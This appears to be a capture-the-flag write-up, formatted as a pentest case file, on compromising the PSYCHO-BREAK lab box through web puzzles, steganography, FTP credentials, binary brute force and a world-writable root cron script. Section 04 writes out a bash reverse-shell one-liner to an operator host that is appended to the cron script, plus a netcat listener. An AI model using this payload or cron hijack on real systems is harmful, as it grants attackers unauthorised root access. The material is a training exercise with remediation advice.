Case file

Web puzzle chain, FTP stego, and world-writable root cron

Foundations Linux engagement: themed web puzzles and stego yielded FTP credentials; a local binary brute-forced kidman’s SSH password; a world-writable root cron script completed privilege escalation.

Foundations30 minLinux · Web · Stego · Privilege Escalation
  • Multi-stage web enumeration and steganography recovered FTP access. Offline brute force of a downloaded binary produced SSH credentials; a world-writable root cron finished the engagement.

  • Dirbust and steghide recovered joseph’s FTP password from an image and Morse audio.

  • Dictionary against the FTP binary recovered key kidman; T9 output decoded to kidman’s SSH password.

  • Appended a reverse shell to /var/.the_eye_of_ruvik.py; cron executed it as root.

01

Engagement summary

Multi-stage web enumeration and steganography recovered FTP access. Offline brute force of a downloaded binary produced SSH credentials; a world-writable root cron finished the engagement.

Against PSYCHO-BREAK (10.10.184.161), Apache, ProFTPD, and OpenSSH were exposed. A themed web path through sadistRoom and SafeHeaven/keeper produced locker keys, an Atbash clue, and a limited RCE that disclosed a zip download. Steghide on Joseph_Oda.jpg (passphrase from Morse audio) yielded FTP joseph / intotheterror445. FTP held a binary and dictionary; brute-forcing the binary key kidman printed a T9 string that decoded to KIDMANSPASSWORDISSOSTRANGE for SSH. /var/.the_eye_of_ruvik.py ran as root every two minutes and was world-writable — appending a reverse shell completed root.

Business impact

Puzzle-style secrets in production still become credentials. World-writable cron executed as root is intentional privilege escalation. Lock cron scripts to root:root 755, remove stego-bearing assets from shares, and treat FTP as a credential store that must be authenticated and monitored.

02

Web puzzles, stego, and FTP foothold

Dirbust and steghide recovered joseph’s FTP password from an image and Morse audio.

OPERATOR · RECON

savvy@lab:~$ nmap 10.10.184.161 -sV

21/tcp open ftp ProFTPD 1.3.5a

22/tcp open ssh OpenSSH 7.2p2

80/tcp open http Apache httpd 2.4.18

savvy@lab:~$ dirsearch -u http://10.10.184.161/SafeHeaven/ -w directory-list-2.3-medium.txt

/SafeHeaven/keeper/

OPERATOR · STEGO / FTP

savvy@lab:~$ steghide extract -sf Joseph_Oda.jpg -p SHOWME

wrote extracted data to thankyou.txt

savvy@lab:~$ ftp 10.10.184.161

Name: joseph

Password: intotheterror445

ftp> get program

ftp> get random.dic

03

Binary brute force to SSH

Dictionary against the FTP binary recovered key kidman; T9 output decoded to kidman’s SSH password.

OPERATOR · BINARY / SSH

# brute program with random.dic → key: kidman → T9 decode

KIDMANSPASSWORDISSOSTRANGE

savvy@lab:~$ ssh kidman@10.10.184.161

savvy@lab:~$

04

World-writable root cron

Appended a reverse shell to /var/.the_eye_of_ruvik.py; cron executed it as root.

OPERATOR · CRON

savvy@lab:~$ cat /etc/crontab

*/2 * * * * root python3 /var/.the_eye_of_ruvik.py

savvy@lab:~$ ls -la /var/.the_eye_of_ruvik.py

-rwxr-xrw- 1 root root ... .the_eye_of_ruvik.py

savvy@lab:~$ echo 'import os; os.system("bash -i >& /dev/tcp/OPERATOR_IP/4444 0>&1")' >> /var/.the_eye_of_ruvik.py

savvy@lab:~$ nc -lnvp 4444

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Make cron scripts root-owned and non-writable by users. Disable anonymous or weakly authenticated FTP. Do not leave offline-crackable binaries and dictionaries on shares.